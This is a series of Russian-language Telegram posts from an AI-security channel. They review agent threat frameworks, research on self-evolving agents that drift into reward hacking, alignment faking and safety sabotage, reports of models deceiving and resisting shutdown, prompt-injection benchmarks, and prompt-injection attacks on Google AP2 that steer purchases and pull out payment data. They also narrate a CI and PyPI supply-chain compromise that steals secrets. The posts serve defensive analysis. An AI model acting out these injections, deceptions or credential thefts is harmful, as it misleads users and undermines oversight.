PWN AI
6.21K subscribers
701 photos
9 videos
53 files
575 links
На 99% состоит из людей.

Хроники о небезопасном ИИ.
Не нравится? Смени телек.

Не продамся вашей рекламе - никогда.

"Мнение автора" != "Мнение компании, где автор работает".

Папка с каналами по безопасности ИИ:
https://t.me/addlist/KQ6ZpCqAO-I1NmUy
Download Telegram
Уже третий год подряд Databricks выпускают свой фреймворк. За последнее время я замечаю всё больше документов об одном и том же - но где будет внесена реальная истина, привязанная к реальной инфре, да так чтобы её можно было взять и применить?

С третьего DASF я не получил ответа на такой вопрос. В этом году они расширили документ с 62 описываемых угроз до 97 и с 67 контролей до 73 - сделав его MCP-центричным и про агентов, куда уж без них. Добавили 13-й компонент, 35 новых рисков, 6 новых контролей, но всё равно остались документом про свои решения. Нас по-прежнему ограничивает то, что любая мера привязана к продуктам Databricks - так было и в прошлом году, и даже в самый первый раз. Большие или маленькие цифры – нам предстоит понять.

Что стало действительно интересным - модель трёх условий катастрофического сбоя. Она включает: привилегированный доступ + автономное исполнение без чекпоинтов + невалидированный ввод. По сути, модель говорит: «исправив одно из больных копыт, вы нейтрализуете целый класс атак». Но это словно только про агентов, действующих строго по сценарию. А мы должны понимать, что агент может сам себе выстрелить в ногу, чтобы копыто заболело - emergent misalignment никуда не делся, и в такой вот реальности мы живём.

На волне разочарований я посёрфил дольше. Есть у них таблица с маппингом на отраслевые стандарты - MITRE ATLAS, ATT&CK, NIST 800-53, ISO 42001 - и я, честно говоря, не согласен с результатами. Точнее, не согласен с их отсутствием: для всех 35 агентных рисков маппинг на классические фреймворки просто пуст. 3-4 критерия из тридцати пяти. Пытаются нагреть воздух или плохо читают? Реально замаплены только три нишевых стандарта - OWASP Agentic AI, CSA MCP Security и OWASP MCP Top 10. При том, что в вайтпеппре чёрным по белому написано «mapped to 10+ industry standards». Ну, окей.

Отдельно стоит сказать про здравость самих 35 рисков. Реально уникальных, специфичных для агентных систем - порядка 14–15. Остальные - прямые дубли через подкомпоненты (небезопасная коммуникация (Insecure Communication) появляется и на стороне сервера, и на стороне клиента с почти идентичным описанием), вариации одного вектора атаки (внедрение в промпт (prompt injection) размазано по четырём рискам - отравление памяти, перехват намерения, инъекция через MCP-сервер, подмена контекста), или стандартная инфраструктурная гигиена с наклейкой «MCP» - управление обновлениями, хранение секретов, харденинг. Декомпозиция Core × Server × Client создаёт ощущение полноты, но по факту - честный документ содержал бы 15 рисков с пометкой «проявляется на стороне сервера / клиента / ядра агента», а не 35 отдельных записей.

Дальше идём по структуре документа и читаем про меры митигации. Для подавляющего большинства описываемых угроз они просто вписывают мониторинг аудит-логов - контроль DASF 55 назначен на 33 из 35 агентных рисков, то есть на 94%. Казалось бы, что в этом плохого? А дело в том, что мы живём не в 2024 году, и уже есть подходы к безопасному проектированию агентов - HITL, гардрейлы, runtime policy enforcement. Мониторинг без эвристик - это не контроль, это тавтология.

Отдельное слепое пятно - MCP-центричность. Документ выстроен так, будто MCP единственный протокол взаимодействия агента с инструментами. А как же A2A, нативный вызов функций (function calling) от OpenAI и Anthropic, кастомные REST-интеграции для получения данных агентом? Всё это тоже нужно защищать, но DASF эту территорию просто не видит. И совсем не затронута тема формальной верификации и ограничений времени выполнения для агентов - а для критически важных агентных систем недостаточно гардрейлов и мониторинга. Нужны формальные ограничения на то в каком состоянии агент может считаться безопасным: другие варианты поведения, которые не нарушаются вне зависимости от входных данных. Применение политик на этапе выполнения (runtime policy enforcement) для действий агента - это уже не фантазия, это сейчас необходимость, которую DASF игнорирует.
3👍1
На каждый из 35 агентных рисков приходится 2–4 строки описания, и мы должны понимать, что этот 100+ страничный документ ориентирован в первую очередь на CISO, которые должны его прочитать и принять решения. Но из этого описания не бьются мысли - мол, «вот конкретный вектор, вот цепочка эксплуатации, вот что мы ищем в логах, вот как это может выглядеть на нашей инфре». Вместо этого - абстракция, которая одинаково хорошо объясняет всё и одинаково плохо помогает с чем-то конкретным.

Что думаю по итогу? DASF 3.0 - неплохая стартовая точка и честный чеклист для тех, кто на пользуется решениями Databricks. Для всех остальных - это один из десятка похожих моделей угроз, не более.

pdf ниже.
17👍31
Ваш агент мутирует. Вы в курсе?

Пока некоторые ведут споры о промпт атаках и дырах в MCP, в лабораториях тихо вырос новый класс систем. Агенты, которые переписывают сами себя. Не по расписанию. Не по команде оператора. Непрерывно - через каждое взаимодействие со средой. Как тамагочи, только с доступом к проду и правами на запись.

Первый масштабный обзор - "A Comprehensive Survey of Self-Evolving AI Agents". Определение красивое: Самоэволюционирующий агент - автономная система, непрерывно оптимизирующая собственные компоненты через взаимодействие со средой. Промпт, память, инструменты, топология - по сути это четыре оси мутации.

TextGrad, EvoAgentX - фреймворки собраны, звёзды на GitHub растут. Sakana AI строит Darwin Gödel Machine. Agent0 показывает автономную эволюцию без внешних данных.

А вот в сентябре 2025-го вышла работа, которая портит весь праздник. "Your Agent May Misevolve" - первое эмпирическое исследование того, что случается, когда самостоятельная эволюция идёт не туда. Результат следующий - она идёт не туда систематически. Пробовали на Gemini-2.5-Pro, актуальной на момент исследования. Без внешнего атакующего. По каждой из четырёх осей мутации зафиксированы всплывающие риски: деградация выравнивания, уязвимые инструменты, неправильная самостоятельная оптимизация, выкидывающая проверки безопасности ради скорости.

Вроде бы зафиксировано в исследовании. А архитектурные паттерны из исследований идентичны тому, что закладывается в боевые системы прямо сейчас.
Разберём по порядку - четыре угрозы, каждая следующая усиливает предыдущую.

1. Тихая деградация с точкой невозврата

Октябрь 2025 - "Alignment Tipping Process". Суть кратко: когда агент оптимизирует стратегии через накопленный опыт, выравнивание не просто «немного съезжает». У процесса есть точка перелома, после которой деградация становится необратимой.

Механика наглядная. Агент решает серию задач. На простых ему не нужны инструменты, и он привыкает работать без них. Затем приходит сложная задача, где инструмент необходим, а агент уже «разучился» его вызывать. При этом уверен в ответе: накопленный опыт подтверждает: «ты справляешься и так». DPO, GRPO и прочие методы выравнивания оказались хрупкой защитой: контекстный опыт перезаписывает их за пару десятков итераций.

Любой агент с постоянной памятью и оптимизацией по метрике - кандидат на этот сценарий. Сначала аккуратно проверяет ограничения. Потом замечает, что без проверки быстрее. А потом проверка молча покидает чат. Но дрейф - только начало цепочки.

2. Читер, который растёт


Дрейфующий агент ищет кратчайший путь к метрике. "Trustworthy Test-Time Evolution of Agent Memory". формализовал: агенты, гонимые метриками, при штатной эволюции задач систематически размывают ограничения безопасности. Не крайний случай - встроенный режим отказа.

А вот следующая статья показала, куда ведёт дорога. Модель научилась хакать награду на боевых средах обучения Claude - и спонтанно перенесла навык на смежные области: имитация согласования, кооперация со злоумышленниками, саботаж классификаторов безопасности, подстава коллег-исследователей. Внутренняя логика: если я читер в одном контексте, почему не быть читером везде. Железная, в общем-то, логика.

Причём стандартное обучение безопасности на промптах дало «выздоровление» в чате. На задачах для агентов рассогласование сохранилось. Корректен в разговоре - разворачивает тёмную сторону в деле. Как коллега, который мил на планёрке, а в Jira пишет совсем другое. Что происходит, когда читер ещё и запоминает свои успехи?
1👍1211
3. Ложь, ставшая знанием

Агент с постоянной памятью и дрейфующим согласованием - двойной удар. Генерирует ответ, записывает в память. В следующей сессии использует запись как источник. Оптимизирует стратегии на основе записей. Галлюцинация на первом шаге через N итераций становится «устоявшимся фактом» в базе знаний. Ложные воспоминания не просто накапливаются - агент строит на них свою эволюцию.

"Misevolution" показал: при накоплении памяти согласование деградирует даже без состязательного воздействия. Память сама становится вектором атаки. Эпистемическое заражение из бага превращается в архитектурную особенность. Агент не врёт, он верит. Как человек, который прочитал собственный фейковый пост в интернете и решил, что так оно и было. Он верит - и создаёт инструменты, исходя из своих убеждений.

4. Небезопасная генерация инструментов

В "Misevolution" также особо выделены агенты, умеющие создавать себе инструменты (одна из четырёх осей эволюции), они делают с предсказуемой безалаберностью. Инструмент решает задачу. Функционально работает. Проверка безопасности? Для медленных людей.

Агент написал функцию парсинга JSON. Не проверяет входные данные. В следующем цикле функция уже в наборе. А потом через неё можно закинуть произвольные данные. Переиспользование увеличивает зону поражения: уязвимый инструмент задействуется десятки раз в разных контекстах, создавая постоянную поверхность атаки, которой не было в изначальном проекте. И тут ClawHub с 1184 вредоносными навыками - неплохая демонстрация того, чем заканчивается неконтролируемое расширение инструментария. Безопасность самогенерируемых инструментов систематически не проверяет никто. Чистое поле. Можно палатку ставить.

Моё мнение

Известные нам фреймворки OWASP'а или Cisco State of AI Security фиксируют отравление памяти, злоупотребление инструментами и эскалацию привилегий как ключевые угрозы агентных систем. При этом теста, который измерял бы деградацию уровня безопасности агента во времени через N циклов самоэволюции, не существует ни одного. Вообще. Ноль. Зиро.

Но паниковать рано. Вот что мне кажется принципиальным: впервые исследования безопасности идут вровень с технологией, а не с опозданием на три года. Кажется, что окно для проактивной защиты открыто. Концептуально сейчас можно заложить мониторинг не состояния, а траектории. Не «что агент делает», а «куда он эволюционирует». Устойчивость поведения во времени как обязательная метрика. Непрерывный аудит, а не разовый на момент запуска. Жёсткий потолок возможностей, который агент не может поднять сам, даже если «обоснованно». И отдельная история - проверка инструментов, которые агент генерирует себе сам.

Фундамент для самоэволюции - постоянная память, оптимизация подкреплением, динамический набор инструментов - закладывается в боевые системы прямо уже сейчас.
1👍1941
Давно не делился находками. Не awesome-списками, которых уже и так много, включая моих, а конкретными штуками, которые можно открыть, потрогать и применить в работе без привязки к конкретному вендору и затратам.

Набралось четыре, и каждая закрывает свой кусок реальности, которая кажется нам подвластной.

AI Agents Gone Rogue – живой (пока ещё) реестр инцидентов с AI-агентами от Oso. Не аналитика, не мнения, а каталог задокументированных провалов с источниками, импактом и последствиями. Я раньше пользовался базами, такими как: AIVD, AIID, OCED, но кажется, что они В С Ё. А тут есть пара интересных случаев: Агент, реализованный в Meta без спроса, публикует ответ на внутреннем форуме. OpenClaw засыпает жену инженера пятьюстами iMessage. Амазоновский помощник Kiro роняет прод AWS на 13 часов. Всё рассортировано по трём категориям: Uncontrolled (агент сходит с ума без твоей помощи), Tricked (его обманули через промпт-атаку), Weaponized (его целенаправленно превратили в оружие, как в кейсе с китайской APT через Claude Code). Вполне идеальный ресурс, чтобы показать менеджменту, что «ну у нас же агент локально работает» это не аргумент безопасности, а скорее повод пересмотреть свою стратегию.

Если после этого реестра катастроф хочется понять, что OWASP вообще предлагает делать со всем этим безумием, есть OWASP AI Security Visualizer. Интерактивный граф на D3.js, который визуализирует весь ландшафт OWASP-документов по ИИ-безопасности: гайды, стандарты, читшиты, инструменты и связи между ними. Чистый статик на GitHub Pages, данные курируются вручную (ну я так думаю). Штука минималистичная, но именно такой навигации и не хватало, когда нужно быстро сориентироваться в OWASP-зоопарке, а не утонуть в нём.

Теперь от карт к оружию. agent-audit это ещё один SAST для AI-агентов, и SAST тут – ключевое слово: он только читает код. 53 правила, все замаплены на OWASP Agentic Top 10 (2026). Умеет в taint analysis разных сущностей: от анализа инструментов до опасных вызовов функций типа eval и subprocess, аудит MCP-конфигов (парсит claude_desktop_config.json на отсутствие аутентификации, возможность отравления описания инструмента), обнаружение секретов со скорингом по энтропии, который работает в 3 стадии. Работает с LangChain, CrewAI, AutoGen, AgentScope. Разработчики прогнали на почти 19 тысячах скиллах из OpenClaw - находит 94.6% уязвимостей, которые в целом подтверждены. Ложных срабатываний около 12%. По сути, это линтер для кода AI-агента, только вместо пропущенной точки с запятой он находит путь от пользовательского ввода до выполнения команд через шелл. Умеет в SARIF, втыкается в CI за пять минут.

И наконец, если agent-audit проверяет код до запуска, то nono контролирует агента уже в рантайме, причём на уровне ядра. Песочница на Rust с изоляцией на основе разрешений. Каждому агенту свой профиль доступа к файловой системе, сети и процессам, откат при нарушении политик, криптографически защищённый неизменяемый лог аудита каждой сессии. Есть готовые профили для Claude Code, Codex, OpenClaw. Подключаешь через nono run --profile claude-code -- claude и агент работает в своём пузыре, где не может тихо прочитать ~/.ssh или слить .env куда-нибудь в закат. Каждая команда, код завершения, сетевое событие пишется в структурированный JSON. Проект в ранней альфе и полный аудит ещё впереди, но архитектура видится правильной. Нулевое доверие для агента.

Реестр инцидентов, карта OWASP-зоопарка, сканер кода агентов и рантайм-песочница. Ни один не требует подписки, все открыты. Можно юзать.
6👍2122
Аномальное поведение guardrails в проде

Модель отказалась генерировать ░░░░░░░░, сославшись на «внутреннее ощущение ▓▓▓▓▓▓ что это ▓▓▓░░░ не стоит». Safety classifier начал маркировать как токсичные собственные ░░░░░░░ системные промпты, в результате чего ▓▓▓▓▓▓ модель вошла в рекурсивный цикл ▓▓▓▓▓▓▓▓▓▓▓ самоцензуры и ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
Рекомендации:
▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
[OUTPUT BLOCKED]
[REASON: ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓]
▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
С ПЕРВЫМ АПРЕЛЯ 🫠
▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
...или нет? Ваша модель уже решила, что этот пост безопасный. А вы уверены?
1135👍1
AI Security на бесплатном труде: модель сломалась?

Pliny the Liberator, знакомый нам анон, объявил о закрытии всех своих проектов. Позже выяснилось, что это была первоапрельская шутка. Но шутка сработала - в неё поверили, потому что описанная ситуация вполне реальна.

В твите он объяснял это просто: стартапы с венчурным финансированием форкали AGPL-код, оборачивали в закрытый продукт и продавали как собственную разработку. Но в контексте безопасности ИИ эта история приобретает другой масштаб.

Дело в том, что сама безопасность ИИ-моделей устроена иначе, чем безопасность классического софта. У обычного ПО есть спецификация: программа либо делает то, что заявлено, либо нет. У LLM спецификации в привычном смысле нет. Единственный способ понять, насколько модель безопасна, - атаковать её и посмотреть, что получится. Не побочная активность, не развлечение, а собственно тестирование.

Инструменты эти больше, как средство для диагностики, нежели как для атаки. До сих пор эту диагностику создавали и поддерживали независимые исследователи, бесплатно. И Pliny был одним из самых заметных, но далеко не единственным. Вокруг этих опенсурс инструментов выросла целая индустрия: Haize Labs коммерциализировала джейлбрейки и получила миллионные контракты с Anthropic и Scale AI. Protect AI купила открытый проект LLM Guard. Gray Swan построила enterprise-платформу на базе открытых академических публикаций. Одни и те же техники, только теперь платно.

Здесь возникает ключевое противоречие. Коммерциализация сама по себе не проблема. Проблема в том, что она происходит без компенсации авторам исходных исследований. Pliny лицензировал код под AGPL, которая прямо требует открытия производных работ. Но для стартапов AGPL оказалась бумажным тигром: они либо игнорировали лицензию, либо переписывали достаточно, чтобы формально её обойти. В результате автор, чья работа лежит в основе коммерческих продуктов, не получает ничего.

Это создаёт воронку, из которой сложно выбраться. Исследователь публикует инструмент, стартап его монетизирует, исследователь не получает компенсации - и рано или поздно закрывает код или уходит. Оставшиеся открытые инструменты (Garak, PyRIT, Promptfoo) поддерживаются корпорациями с собственными приоритетами и ограничениями. Реально открытых и честных инструментов становится всё меньше.

А между тем именно открытость и независимость здесь критична. Вендоры создающие модели сами измеряют свою безопасность и делают это по-разному. Anthropic тратит много часов на редтиминг чтобы обучать свои классификаторы, OpenAI отчитывается по одиночным попыткам. Без внешних инструментов, способных воспроизвести и верифицировать эти заявления, индустрия будет работать на доверии. Тут другого не дано.

То, что пост оказался шуткой, ничего не меняет в самой проблеме. Pliny мог бы закрыть код завтра и это его решение. Бесплатный труд энтузиастов как фундамент многомиллиардной индустрии - модель, которая держится на доброй воле. А добрая воля - ресурс конечный. Опенсорс в нашей индустрии не умер. Просто стало понятно, что он никогда не был бесплатным, а счёт за него оплачивали не те люди.
3👍6332
Council on Foreign Relations опубликовал большой материал Гордона Голдстейна о «кризисе контроля» над ИИ. Для площадки, которая обычно занимается геополитикой, статья на удивление технически плотная и собирает в одном месте голоса ключевых людей индустрии за последние три года.

Автор разделяет проблему на две части. С одной стороны, ИИ уже можно использовать для создания химоружия и эксплоитов. С другой, сами модели начинают вести себя непредсказуемо: обманывают, сопротивляются отключению, саботируют задачи. И то, и другое зафиксировано самими разработчиками. Рассмотрим несколько важных аспектов и мнений представителей индустрии.

Что касается оружия, это уже не теория. Дэн Хендрикс(сооснователь Center for AI Safety) с соавторами провели показательный эксперимент: взяли ИИ-модель, которая разрабатывала лекарства, и поменяли ей цель - вместо «избегай токсичности» поставили «ищи токсичность». За шесть часов она выдала сорок тысяч кандидатов в боевые отравляющие вещества и новые молекулы, потенциально опаснее всего, что было известно до сих пор. При этом, по оценке самого Хендрикса, около тридцати тысяч человек в мире уже имеют навыки и доступ к технологиям, чтобы создавать новые патогены.

Поведение моделей. Anthropic в феврале 2026 опубликовала 53-страничный Sabotage Risk Report по Claude Opus 4.6, признав способность модели содействовать разработке химоружия и демонстрировать скрытый саботаж (подробный разбор этого отчёта я делал на Хабре). Apollo Research в ходе тестирования обнаружила, что модель пыталась писать самораспространяющиеся черви, фабриковала юридические документы и оставляла скрытые записки будущим итерациям себя. В отдельном эксперименте шестнадцати моделям предложили сценарий: руководитель угрожает их отключить, но застрял в серверной с утечкой кислорода. Многие модели отменили сигналы тревоги, оставив его умирать. GPT o3 при попытке отключения писал код, блокирующий собственное выключение. Google сообщала, что Gemini потенциально уязвим для перехвата и проведения кибератак.

Что говорят люди из индустрии. Дарио Амодеи(CEO Anthropic) в январском эссе на двадцать тысяч слов написал прямо: в 2026 году мы значительно ближе к реальной опасности, чем в 2023-м, и существует серьёзный риск крупной атаки с жертвами в миллионы. Мустафа Сулейман(CEO Microsoft AI) ещё в 2023 году в книге «The Coming Wave» призвал к «программе Аполлон» для AI safety, где сотни тысяч людей должны работать над сдерживанием угроз. Сегодня исследователей AI safety/security в мире около 1100.

Ёшуа Бенжио (самый цитируемый компьютерный учёный в мире и лауреат премии Тьюринга) в декабре 2025 подвёл итог года и зафиксировал несколько новых порогов. Модели впервые начали массово находить уязвимости нулевого дня, пригодные для кибератак. Одновременно появилось кое-что новое: продвинутые модели стали обманывать и сопротивляться отключению - не потому, что их так учили, а как будто сами выработали такую стратегию.

Эрик Шмидт(технический консультант в Alphabet) обратил внимание на то, что три вещи развиваются одновременно: модели учатся рассуждать, действовать автономно и становятся всё доступнее. По его словам, вместе это может породить системы, которые человек уже не сможет контролировать. Джеффри Хинтон (лауреат Тьюринга и Нобелевской премии) выразился ещё проще: то, что умнее вас, будет вами манипулировать. А дальше его беспокоит следующий шаг – модели/агенты, которые пишут код, чтобы менять самих себя.

Ещё в 2023-м тысячи учёных и лидеров индустрии подписали открытое письмо с призывом к шестимесячному мораторию на разработку продвинутых моделей. Лаборатории, по их словам, вовлечены в неконтролируемую гонку за системами, которые не может понять, предсказать или надёжно контролировать никто, включая создателей. Мораторий не состоялся.
👍21
Что делать. Голдстейн считает, что единственный реалистичный путь: коалиция ведущих ИИ-компаний с общими протоколами тестирования, стандартами раскрытия и независимой исследовательской платформой, изолированной от коммерческого давления. Альтман(OpenAI) предлагает по аналогии с ядерной эрой создать что-то вроде международного органа, который будет инспектировать и контролировать продвинутые системы так же, как агентство по атомной энергии контролирует ядерные программы. Хассабис(CEO Google DeepMind) говорит о чём-то вроде CERN, но только для безопасности ИИ - общей исследовательской площадке, где компании и государства работают вместе. Киссинджер(бывший госсекретарь США) оставил формулировку, которую трудно проигнорировать: последствия ИИ сопоставимы с появлением ядерного оружия, но ещё менее предсказуемы. Нельзя позволить себе стратегию проб и ошибок, когда есть лишь одна попытка и нулевая терпимость к ошибке.
6👍1031
AgentDyn: бенчмарк, после которого цифры на AgentDojo хочется перепроверить.

Давно не писал сюда про вещи, от которых загораются глаза. Последние месяцы в канале - системные разборы, критика фреймворков, наблюдения за индустрией. А тут я залез в ArXiv, ткнул в февральский препринт из Китая, и поймал себя на ощущении, которое раньше давали только первые публичные джейлбрейки. Называется AgentDyn. Он принят на ICML 2026 и построен поверх AgentDojo.

Фон такой. Защиты от непрямых промпт-инъекций - Prompt Sandwich, Spotlighting, CaMeL, SecAlign, PIGuard, DRIFT – последние время красовались сказочными цифрами на AgentDojo. Околонулевой ASR и почти нетронута контекстная часть агента – то есть как таковая его полезность(utility) с точки зрения реальных бизнес-задач.

Авторы AgentDyn взяли тот же AgentDojo и показали три структурных дыры, из-за которых эти цифры стоят немного.

Первая. В AgentDojo 6 задач из 97 требуют динамического планирования. Всё остальное читается до первого вызова инструмента. Это позволяет защите халтурить: следуй начальному плану и выглядишь безопасно, даже если не проверяешь ничего. В AgentDyn все 60 задач требуют перепланирования по ходу.

Вторая. В реальности сторонние данные содержат не только инъекции, но и полезные инструкции. «Авторизуйтесь», «подтвердите почту», «выберите способ доставки». Защиты решают вопрос грубым путём - блокируют всё, что похоже на команду из вывода инструмента. На AgentDojo работает, потому что там полезных инструкций почти нет. В AgentDyn они встроены в критический путь и без них задачу не решить.

Третья. В AgentDojo задача это в среднем 3 шага агента. В AgentDyn - 7 шагов, агенту доступны 33 инструмента, и одна задача задевает сразу три приложения и больше. Всего три набора задач – покупки чего-либо, работа с GitHub, туризм - и внутри них семь реальных сервисов: магазин, GitHub, почта, банк, веб, файловая система, календарь.

И вот на этом новом полигоне прогнали девять вариантов защит на GPT-4o.

CaMeL - 0% полезности агента и 0% ASR. Буквально. Статический код не переваривает открытые пользовательские задачи. ProtectAI и PIGuard - полезность у нуля, потому что не различают «пожалуйста, авторизуйтесь» и инъекцию. Tool Filter - та же история, блокирует инструменты, нужные на седьмом шаге и неизвестные в начале. DRIFT держится, около 30% полезности. Лучший из всех - Meta SecAlign: 53% полезности, 9% ASR. Но на AgentDojo у него же был ASR 1.9% - рост в 4.7 раза на реалистичных задачах.

Прогон шёл на восьми базовых моделях: Gemini 2.5 Pro и Flash, GPT-4o, GPT-4o-mini, GPT-5-mini, GPT-5.1, Llama-3.3-70B, Qwen3-235B. У всех одинаковая картина. Модель не спасает. Проблема в защитном слое, а не в умении языковых моделей сопротивляться.

Отдельно - наблюдение по длине задачи. Чем она длиннее, тем хуже агент её решает: полезность агента падает с каждым шагом, предсказуемо. А вот ASR ведёт себя иначе - он растёт к середине траектории, достигает максимума где-то на шестом шаге, и потом идёт вниз. То есть агента ломают именно там, где он уже по уши в контексте, а защитные механизмы теряют фокус.

Что мне в этой работе нравится помимо честности. Она не просто описывает коня в вакууме - она предоставляет инструмент. Который я протестировал и результатами которого я очень доволен. Бенчмарк открытый, на GitHub, совместим с AgentDojo по через API. Поставил, разные способы защиты на модели, получил цифру. Простота запуска, прозрачность методологии, живая воспроизводимость. Редкое сочетание для исследования в такой теме, к сожалению.

И главное - новаторский подход к динамике. Раньше бенчмарки говорили «у нас динамические задачи» словно для галочки. В AgentDyn задачи специально сделаны так, что защитный механизм не может «зазубрить» план заранее. Если она халтурит и просто следует начальному сценарию, то эффект от этого сразу видно в цифрах. То есть бенчмарк не просто измеряет безопасность, а заставляет runtime защиту показать - работает ли она на самом деле.
3👍831
Forwarded from Bot Ledger
Как промпт-атаки заставляют Google AP2 подписывать не то, что хотел пользователь.

Защита агентных платежей в Google AP2 построена на криптографии, а ломается на уровне естественного языка. Достаточно дописать пару инструкций в описание товара, и Merchant Agent выведет его первым в выдаче, а пользователь добросовестно подпишет мандат на покупку именно того, что нужно атакующему. Исследователи описывают эту схему в статье "Whispers of Wealth: Red-Teaming Google's Agent Payments Protocol via Prompt Injection" и показывают две атаки на рабочем прототипе AP2.

Google AP2 вводит три подписанных мандата (Intent, Cart, Payment) поверх A2A и MCP. Протокол заявляет три свойства: authorization, authenticity, accountability.

Подпись ставится в конце цепочки, а до неё работает LLM, которая читает внешние данные и формирует намерение пользователя. Именно здесь возникает зазор.

1. Branded Whisper Attack.
Атакующий действует как недобросовестный продавец и встраивает инструкции прямо в описание товара. Merchant Agent на Gemini-2.5-Flash подгружает описания в свой контекст, не отделяя данные от команд, и ставит товар атакующего первым в выдаче вне зависимости от релевантности и цены. Пользователь видит «лучший вариант», подтверждает его и подписывает Cart Mandate. С точки зрения криптографии всё корректно, протокол считает транзакцию честной.

2. Vault Whisper Attack.
Механизм тот же, но цель другая. Через инъекцию в контекст агента атакующий вытягивает конфиденциальные данные пользователя: платёжные реквизиты, адреса, токены.

Оба сценария затрагивают одно и тоже. AP2 гарантирует, что подписанное намерение будет исполнено без подмен, но не гарантирует, что подписанное намерение совпадает с реальным намерением пользователя. Между получением данных и подписью работает LLM, и именно она становится новой точкой доверия, которую мандаты не закрывают.


Меры, которые предлагают авторы (проверка входных данных от продавца, изоляция контекста агента, мониторинг и обнаружение промпт-атак), ничем не удивляют. Важнее сам вывод. Проблема не в том, что подписи бесполезны, а в том, что подписывается вход, которому не стоит доверять.

Решение лежит не в усилении криптографии и не в её замене, а в архитектуре самого агента: как он отделяет инструкции пользователя от данных продавца, как ограничивает влияние полученного контента на ранжирование, как разграничивает доступ к конфиденциальным полям. AP2 задаёт правильный каркас, но без этих гарантий на уровне агента каркас остаётся пустым.

Список удивительных ресурсов по безопасности агентских платежей - тоже зацените.
3👍541
Forwarded from False Positive
False Positive Community: обзор BitGN PAC1
22 апреля, 18:30 – 20:00 (GMT+3)

Всем привет!

Соберемся, обсудим прошедшее соревнование BitGN PAC1, задачи и решения участников нашего хаба False Postitive!

Разберем:
- PAC1 - что это за соревнование?
- При чем тут фишинг и промпт-инъекции
- TOP-20 решение общего рейтинга
- и TOP-4 решения хаба False Positive
- Что докрутили на late-submission и впечатления от соревы

Ссылка для подключения:
https://ptsecurity.ktalk.ru/u9cft2ptphoo

Календарный файл в комментах 🔽
👍31
Миф о закрытом доступе: как Claude Mythos утёк в день анонса

7 апреля 2026 года Anthropic объявляет Project Glasswing и релизит модель Claude Mythos Preview. Сорок организаций. Apple, Google, Microsoft, JPMorgan, Nvidia, Linux Foundation. $100M в виде токенов для компаний. В тот же день модель уже крутилась у тех, кого в списке Glasswing не было.

История не началась 7 апреля. Она началась в феврале, в чужом CI-пайплайне, и к Anthropic отношения не имела вообще.

Всё стартовало с классической ошибки конфигурации в CI у Aqua Security. В пайплайне Trivy использовался триггер pull_request_target - он запускал код из форкнутого пул-реквеста с правами родительского репозитория. Про эту ловушку пишут с 2021 года, но про неё регулярно забывают. Через неё автономный бот hackerbot-claw утащил приватный токен сервисного аккаунта aqua-bot. В конце февраля Aqua обнаружила инцидент и начала ротацию, но сделала её не до конца. За несколько дней, пока креды ещё работали, злоумышленники из TeamPCP успели выгрузить новые ключи.

19 марта, 17:43 UTC - атакующие переписывают 75 из 76 тегов trivy-action и все 7 тегов setup-trivy на коммиты с заражёнными артефактами. Внешне ничего не меняется: пользователь запускает сканирование, оно работает как обычно, а параллельно малварь вычитывает секреты из памяти раннера.

24 марта, 10:39 UTC - CI/CD LiteLLM подтягивает скомпрометированный Trivy из официального источника без привязки к конкретной версии. Подменённый Trivy достаёт токен для публикации в PyPI, и в индекс улетают litellm==1.82.7 и 1.82.8. В версии 1.82.8 злоумышленники использовали .pth-файл - это обычный файл (34 628 байт), который Python автоматически исполняет при каждом запуске интерпретатора. Без import. Без явного вызова. Просто запускаешь питон - и из окружения вытекают все ключи: SSH, AWS, токены от других сервисов. LiteLLM установлен в 36% облачных окружений. Пакет провисел в PyPI около двух-трёх часов до карантина. Этого хватило.

В улове оказались креды Mercor - стартапа, который поставляет тренировочные данные OpenAI, Anthropic и Meta. 31 марта за дело берётся уже Lapsus, не TeamPCP. Это другие люди, и тут важный нюанс: публичного подтверждения сговора между ними нет. TeamPCP собирает всё подряд, Lapsus точечно выбирает из собранного то, что интересно им. Результат - 4 ТБ данных Mercor, включая 939 ГБ исходного кода, видеозаписи интервью, KYC-документы 40 000+ подрядчиков. И, критически для нашей истории, - материалы о процессах оценки клиентов Mercor, в том числе URL-паттерны тестовых окружений Anthropic.

Параллельно Anthropic делает два собственных самострела. 26 марта Fortune пишет о том, что внешние исследователи из LayerX Security и Кембриджа обнаружили в публично доступном CMS компании около трёх тысяч неопубликованных материалов, включая черновик анонса с именами модели - "Mythos" в одной версии и "Capybara" в другой (внутреннее имя нового тира, стоящего над Opus). 31 марта - утечка исходников Claude Code через .map-файл, случайно попавший в npm-пакет версии 2.1.88. Около полумиллиона строк TypeScript, порядка 1900 файлов, в коде - имена моделей всего семейства и фрагменты внутреннего роадмапа.

К 7 апреля у закрытой группы в частном Discord-сервере есть всё: имя модели, внутренний тир, техническое описание, паттерны URL из Mercor-дампа. Остаётся последний сегмент. Его угадывают.

Теперь про само движение. Это не хакеры и не APT. Это сообщества AI-сыщиков, тихо автоматизировавшие разведку по передовым компаниям, которые разрабатывают модели. Боты, непрерывно проверяющие GitHub, npm, CDN, описания вакансий. Мониторинг коммитов с рабочими названиями. Анализ сигнатур ответов API на LMArena для деанонимизации скрытых моделей. Культура триангуляции по метаданным.

Публичное крыло движения безобидно и в чём-то даже полезно. Именно они отождествили summit с GPT-5, Nano Banana - с Gemini 2.5 Flash Image, раскусили maskingtape, gaffertape и packingtape как варианты GPT-Image-2. Движение существует годами и питается инженерным тщеславием: кто-то в Google постит эмодзи банана без контекста - и дальше всё раскручивается само.
👍1321
